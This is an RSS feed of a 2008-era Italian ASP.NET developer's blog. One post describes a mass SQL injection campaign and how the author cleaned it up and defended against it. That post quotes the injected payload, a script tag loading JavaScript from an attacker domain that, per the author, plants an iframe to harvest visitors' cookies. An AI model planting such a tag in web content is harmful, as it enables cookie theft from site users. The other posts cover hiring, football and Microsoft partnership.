<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/" xmlns:copyright="http://blogs.law.harvard.edu/tech/rss" xmlns:image="http://purl.org/rss/1.0/modules/image/">
    <channel>
        <title>WIGAI</title>
        <link>http://blogs.ugidotnet.org/dcampanella/Default.aspx</link>
        <description>Il blog di Dario Campanella</description>
        <language>it-IT</language>
        <copyright>Dario Campanella</copyright>
        <generator>Subtext Version 2.6.0.0</generator>
        <image>
            <title>WIGAI</title>
            <url>http://blogs.ugidotnet.org/images/RSS2Image.gif</url>
            <link>http://blogs.ugidotnet.org/dcampanella/Default.aspx</link>
            <width>77</width>
            <height>60</height>
        </image>
        <item>
            <title>Sql Injection  Cross Site Scripting</title>
            <link>http://blogs.ugidotnet.org/dcampanella/archive/2008/07/02/93258.aspx</link>
            <description>&lt;p&gt;&lt;strong&gt;Problem.&lt;br /&gt;
&lt;/strong&gt;&lt;br /&gt;
Ultimamente si stanno verificando attacchi massivi che bucano soprattutto i siti sviluppati con il vecchio ASP. Ma non solo, anche ASP.Net è vulnerabile ad attacchi che si verificano da qualche mese e che stanno causando grossi problemi a portali di aziende organizzazioni importanti di tutto il mondo.&lt;br /&gt;
&lt;br /&gt;
Questo attacco prevede:&lt;/p&gt;
&lt;p&gt;- la scansione dei parametri utilizzati nelle pagine (get e post)&lt;br /&gt;
- la valorizzazione di tali paramentri con comandi sql scritti in codice binario&lt;br /&gt;
- la conseguente esecuzione dei comandi sql che non fanno altro che appendere, in tutti i campi testuali, un tag html come ad esempio &lt;font face="Arial"&gt;"&amp;amp;lt;script src=http://www.pingbnr.com/b.js&amp;amp;gt; &amp;amp;lt;/script&amp;amp;gt;" &lt;br /&gt;
&lt;br /&gt;
L'effetto è che quando gli utenti accedono al sito viene eseguita una chiamata cross site scripting al file js (sia che la pagina si veda sia che la pagina non si veda in quanto spaccata dal tag - pensate ad una drop down list che carica il valore dal db) , che non fa altro che scrivere un iframe. E' proprio la pagina richiamata dall'iframe che legge tutti i contenuti del cookie dell'utente. La conseguenza si può benissimo intuire: centinaia di migliaia di dati degli utenti salvati nel database degli hackers.&lt;br /&gt;
&lt;br /&gt;
Per saperne di più &lt;font face="Arial"&gt;&lt;a href="http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx"&gt;http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx&lt;/a&gt;&lt;/font&gt;&lt;/font&gt;&lt;/p&gt;
&lt;p&gt;&lt;font face="Arial"&gt;&lt;strong&gt;Solutions.&lt;br /&gt;
&lt;br /&gt;
&lt;/strong&gt;1) La soluzione a questo tipo di attacco è proprio quella di proteggere e controllare i campi utili a costruire la sintassi sql (cosa che ho automatizzato già da un pò di tempo con una dll com+ per i siti asp e ultimamente con una dll .net per i siti asp.net) . &lt;br /&gt;
Microsoft, dopo aver notato la crescita di questo tipo di attacco mette a disposizione un tool che verifica l'intrusività del codice sviluppato &lt;font face="Arial"&gt;&lt;a href="http://blog.html.it/archivi/2008/06/27/un-tool-microsoft-contro-la-sql-injection.php"&gt;http://blog.html.it/archivi/2008/06/27/un-tool-microsoft-contro-la-sql-injection.php&lt;/a&gt;&lt;/font&gt;&lt;/font&gt;&lt;/p&gt;
&lt;p&gt;&lt;font face="Arial"&gt;Ovviamente proteggere le applicazioni richiedono anche tempo e denaro. Il cliente non ha però scelta, deve investire in questo. &lt;br /&gt;
&lt;br /&gt;
2) Chi gestisce i siti dei clienti si ritrovano però a far fronte ad azioni molto più immediate rispetto al lavoro di coprire le falle, proprio per evitare il down prolungato delle loro applicazioni.&lt;br /&gt;
Per questo motivo e per le vicissitudini vissute in prima persona vorrei condividere il mio intervento su un cliente. &lt;br /&gt;
Il problema principale è stato appunto quello di ripulire il codice maligno dalle tabelle.  Ripristinare un backup del database non è sempre la soluzione migliore anche perché:&lt;br /&gt;
&lt;/font&gt;&lt;font face="Arial"&gt;&lt;br /&gt;
- l'attacco può essere avvenuto in giorni diversi e quindi è difficile stabilire il backup opportuno&lt;br /&gt;
- il cliente può aver aggiornato contenuti durante i giorni di presenza dello script maligno&lt;br /&gt;
- finché non si implementa la sicurezza delle pagine il sito è a rischio quotidiano di nuovi attacchi&lt;br /&gt;
 &lt;br /&gt;
In questi casi rimane che ripulire il codice e monitorare l'applicazione. Ho pertanto implementato una procedura (riutilizzando proprio lo script di chi ha attaccato) che, sfruttando le tabelle di sistema, non fa altro che scandire tutti i campi testuali di tutte le tabelle e rimuovere gli script maligni. Tali script vengono enumerati a loro volta in una tabella degli script maligni e quindi eliminati attraverso l'esecuzione di una stored procedure.&lt;br /&gt;
&lt;br /&gt;
Inoltre, attraverso un job schedulato di sql, è possibile automatizzare l'intervento quotidianamente, finchè non viene rilasciata la release sicura dell'applicazione.&lt;br /&gt;
&lt;br /&gt;
Un'altra azione da fare è di negare all'utente di sql, utilizzato per interagire con le tabella della vostra applicazione,  l'accesso alle tabelle di sistema. In questa maniera non si dà la possibilità di scandire le tabelle del database.&lt;br /&gt;
&lt;br /&gt;
A chi fosse interessato posso inviare l'intero script sql che ripulisce il database del codice maligno. &lt;br /&gt;
&lt;/font&gt;&lt;/p&gt;&lt;img src="http://blogs.ugidotnet.org/dcampanella/aggbug/93258.aspx" width="1" height="1" /&gt;</description>
            <dc:creator>Dario Campanella</dc:creator>
            <guid>http://blogs.ugidotnet.org/dcampanella/archive/2008/07/02/93258.aspx</guid>
            <pubDate>Wed, 02 Jul 2008 13:48:31 GMT</pubDate>
            <comments>http://blogs.ugidotnet.org/dcampanella/archive/2008/07/02/93258.aspx#feedback</comments>
            <slash:comments>10</slash:comments>
            <wfw:commentRss>http://blogs.ugidotnet.org/dcampanella/comments/commentRss/93258.aspx</wfw:commentRss>
            <trackback:ping>http://blogs.ugidotnet.org/dcampanella/services/trackbacks/93258.aspx</trackback:ping>
        </item>
        <item>
            <title>[OT][MI] Cerco sviluppatori asp.net</title>
            <link>http://blogs.ugidotnet.org/dcampanella/archive/2008/02/05/91010.aspx</link>
            <description>&lt;p&gt;Per la mia azienda Drake (sito &lt;a href="http://www.drake.it/"&gt;www.drake.it&lt;/a&gt;) sto cercando immediatamente 2 figure di sviluppatori per ampliamento organico.&lt;br /&gt;
&lt;br /&gt;
Requisiti minimi:&lt;br /&gt;
&lt;br /&gt;
- ottima conoscenza di ASP.Net  2.0 (C#)&lt;br /&gt;
- ottima conoscenza del framework 2.0 &lt;br /&gt;
- ottima conoscenza di Sql Server 2000-2005 &lt;/p&gt;
&lt;p&gt;Avranno titolo preferenziale gli MCP.&lt;br /&gt;
&lt;br /&gt;
La sede di lavoro è Milano centro. Residenza o domicilio nel raggio di 30 Km da Milano centro.&lt;/p&gt;
&lt;p&gt;Si offre un contratto a tempo indeterminato e un compenso adeguato all'esperienza.&lt;/p&gt;
&lt;p&gt;Contattatemi pure all'indirizzo &lt;a href="mailto:dcampanella@drake.it"&gt;dcampanella@drake.it&lt;/a&gt; allegado il cv in formato doc o pdf e dando l'autorizzazione al trattamento dei dati anagrafici.&lt;br /&gt;
&lt;br /&gt;
Grazie!&lt;/p&gt;&lt;img src="http://blogs.ugidotnet.org/dcampanella/aggbug/91010.aspx" width="1" height="1" /&gt;</description>
            <dc:creator>Dario Campanella</dc:creator>
            <guid>http://blogs.ugidotnet.org/dcampanella/archive/2008/02/05/91010.aspx</guid>
            <pubDate>Tue, 05 Feb 2008 00:07:12 GMT</pubDate>
            <comments>http://blogs.ugidotnet.org/dcampanella/archive/2008/02/05/91010.aspx#feedback</comments>
            <slash:comments>9</slash:comments>
            <wfw:commentRss>http://blogs.ugidotnet.org/dcampanella/comments/commentRss/91010.aspx</wfw:commentRss>
            <trackback:ping>http://blogs.ugidotnet.org/dcampanella/services/trackbacks/91010.aspx</trackback:ping>
        </item>
        <item>
            <title>Colloqui e lavoro</title>
            <link>http://blogs.ugidotnet.org/dcampanella/archive/2007/09/13/88320.aspx</link>
            <description>&lt;p&gt;Concordo con &lt;a href="http://blogs.ugidotnet.org/PhilloPuntoIt/archive/2007/09/13/colloqui.aspx"&gt;Massimo&lt;/a&gt; sul fatto che esiste molta gente competente che non lascia traccia di sé. &lt;br /&gt;
Lo noto soprattutto quando leggo i vari cv dove è difficile trovare riferimenti a lavori fatti, vuoi perché sono applicazioni intranet vuoi perché c'è un'autenticazione vuoi perché non si ha motivazione a condividere le proprie gratificazioni con gli altri.&lt;/p&gt;
&lt;p&gt;Rispetto al basso livello qualitativo cui si riferisce &lt;a href="http://blogs.ugidotnet.org/RamMuayBlog/archive/2007/09/13/88314.aspx"&gt;Stefano&lt;/a&gt; credo che non sia legato alla professionalità di chi lavora sul software ma al fatto che le aziende italiane purtroppo non viaggiano alla stessa velocità delle nuove tecnologie. Questo perché non sono orientate al cambiamento e restano legate a vecchi modelli di business (abbiamo visto tutti quante belle realtà hanno chiuso). L'effetto è appunto un prodotto fatto in poco tempo e si veda, se funziona tanto meglio.&lt;/p&gt;
&lt;p&gt;C'è da dire che  per quanto sia facile trovare gente tecnicamente preparata risulta altresì difficile trovare mentalità aperte al cambiamento, cioè persone che si mettono in discussione, con umiltà, tutti i giorni. Questo per imparare ad essere sempre più bravi e competitivi con il mercato. &lt;br /&gt;
&lt;br /&gt;
Queste sono le vere doti che le aziende devono salvaguardare con gelosia e coltivare nel tempo, a cui segue la preparazione tecnica, le certificazioni e quant'altro.&lt;br /&gt;
&lt;br /&gt;
Certo, se il mercato italiano è fatto di consulenti che stanno "due mesi di lì e altri tre di là" è ovvio che è difficile trovare queste qualità nelle persone e continuità sui progetti (e quindi qualità).&lt;br /&gt;
&lt;br /&gt;
E io faccio veramente fatica adirittura (perché oggi lo fanno in pochi)  proponendo contratti di assunzione a tempo indeterminato! Se conoscete qualcuno interessato... rimandatelo a &lt;a href="http://blogs.ugidotnet.org/dcampanella/archive/2007/09/12/88290.aspx"&gt;questo link&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;/p&gt;&lt;img src="http://blogs.ugidotnet.org/dcampanella/aggbug/88320.aspx" width="1" height="1" /&gt;</description>
            <dc:creator>Dario Campanella</dc:creator>
            <guid>http://blogs.ugidotnet.org/dcampanella/archive/2007/09/13/88320.aspx</guid>
            <pubDate>Thu, 13 Sep 2007 17:00:39 GMT</pubDate>
            <comments>http://blogs.ugidotnet.org/dcampanella/archive/2007/09/13/88320.aspx#feedback</comments>
            <slash:comments>12</slash:comments>
            <wfw:commentRss>http://blogs.ugidotnet.org/dcampanella/comments/commentRss/88320.aspx</wfw:commentRss>
            <trackback:ping>http://blogs.ugidotnet.org/dcampanella/services/trackbacks/88320.aspx</trackback:ping>
        </item>
        <item>
            <title>Una gioia immensa: Forza Italia!!!!!</title>
            <link>http://blogs.ugidotnet.org/dcampanella/archive/2006/07/05/44045.aspx</link>
            <description>&lt;P&gt;Milano ieri sera era un delirio!! Finalmente a quasi 30 anni riesco a rivivere le emozioni&amp;nbsp;percepite (per quello che era possibile)&amp;nbsp;a 5 anni in quel caldo luglio dell'82!&lt;/P&gt;
&lt;P&gt;Grazie mille azzurri!! Avete dominato come dei LEONI!!&lt;BR&gt;&lt;BR&gt;Sono fiero di essere italiano!&lt;BR&gt;&lt;/P&gt;&lt;img src="http://blogs.ugidotnet.org/dcampanella/aggbug/44045.aspx" width="1" height="1" /&gt;</description>
            <dc:creator>Dario Campanella</dc:creator>
            <guid>http://blogs.ugidotnet.org/dcampanella/archive/2006/07/05/44045.aspx</guid>
            <pubDate>Wed, 05 Jul 2006 10:19:00 GMT</pubDate>
            <comments>http://blogs.ugidotnet.org/dcampanella/archive/2006/07/05/44045.aspx#feedback</comments>
            <slash:comments>11</slash:comments>
            <wfw:commentRss>http://blogs.ugidotnet.org/dcampanella/comments/commentRss/44045.aspx</wfw:commentRss>
            <trackback:ping>http://blogs.ugidotnet.org/dcampanella/services/trackbacks/44045.aspx</trackback:ping>
        </item>
        <item>
            <title>Microsof Certified Partner</title>
            <link>http://blogs.ugidotnet.org/dcampanella/archive/2006/06/21/43304.aspx</link>
            <description>&lt;P&gt;Lo scorso febbraio la mia societ&amp;#224; ha perso il "titolo" di Certified Partner, che pi&amp;#249; che dare dei vantaggi di opportunit&amp;#224; di business secondo me &amp;#232; un modo per avere uno sconto sulle licenze di sviluppo. Il motivo &amp;#232; stato una cattiva informazione secondo cui uno dei requisiti fondamentali &amp;#232; quello di possedere 2 persone certificate in azienda.&lt;/P&gt;
&lt;P&gt;In realt&amp;#224; ho scoperto che, in alternativa, basta farsi certificare la propria applicazione con VeriTest (&lt;A href="http://www.microsoft.com/italy/partner/partnering/isv/veritest.mspx"&gt;http://www.microsoft.com/italy/partner/partnering/isv/veritest.mspx&lt;/A&gt;). E pertanto pensavo di seguire questa strada visto che al momento nessuno avrebbe la possibilit&amp;#224; di studiare da scolaro, dopo 10 ore di intenso lavoro quotidiano, e invece applicazioni da testare potremmo averne a sufficienza.&lt;BR&gt;&lt;BR&gt;Qualcuno di voi ha mai intrapreso questa strada? Pu&amp;#242; darmi dei consigli?&lt;/P&gt;
&lt;P&gt;Grazie.&lt;/P&gt;
&lt;P&gt;D&lt;/P&gt;
&lt;P&gt;&lt;BR&gt;&lt;BR&gt; &lt;/P&gt;&lt;img src="http://blogs.ugidotnet.org/dcampanella/aggbug/43304.aspx" width="1" height="1" /&gt;</description>
            <dc:creator>Dario Campanella</dc:creator>
            <guid>http://blogs.ugidotnet.org/dcampanella/archive/2006/06/21/43304.aspx</guid>
            <pubDate>Wed, 21 Jun 2006 19:50:00 GMT</pubDate>
            <comments>http://blogs.ugidotnet.org/dcampanella/archive/2006/06/21/43304.aspx#feedback</comments>
            <slash:comments>15</slash:comments>
            <wfw:commentRss>http://blogs.ugidotnet.org/dcampanella/comments/commentRss/43304.aspx</wfw:commentRss>
            <trackback:ping>http://blogs.ugidotnet.org/dcampanella/services/trackbacks/43304.aspx</trackback:ping>
        </item>
        <item>
            <title>Benvenuti</title>
            <category>What Is Good About It</category>
            <link>http://blogs.ugidotnet.org/dcampanella/archive/2006/05/18/40948.aspx</link>
            <description>Ecco il mio primo post!&lt;img src="http://blogs.ugidotnet.org/dcampanella/aggbug/40948.aspx" width="1" height="1" /&gt;</description>
            <dc:creator>Dario Campanella</dc:creator>
            <guid>http://blogs.ugidotnet.org/dcampanella/archive/2006/05/18/40948.aspx</guid>
            <pubDate>Thu, 18 May 2006 10:40:00 GMT</pubDate>
            <comments>http://blogs.ugidotnet.org/dcampanella/archive/2006/05/18/40948.aspx#feedback</comments>
            <slash:comments>46</slash:comments>
            <wfw:commentRss>http://blogs.ugidotnet.org/dcampanella/comments/commentRss/40948.aspx</wfw:commentRss>
            <trackback:ping>http://blogs.ugidotnet.org/dcampanella/services/trackbacks/40948.aspx</trackback:ping>
        </item>
    </channel>
</rss>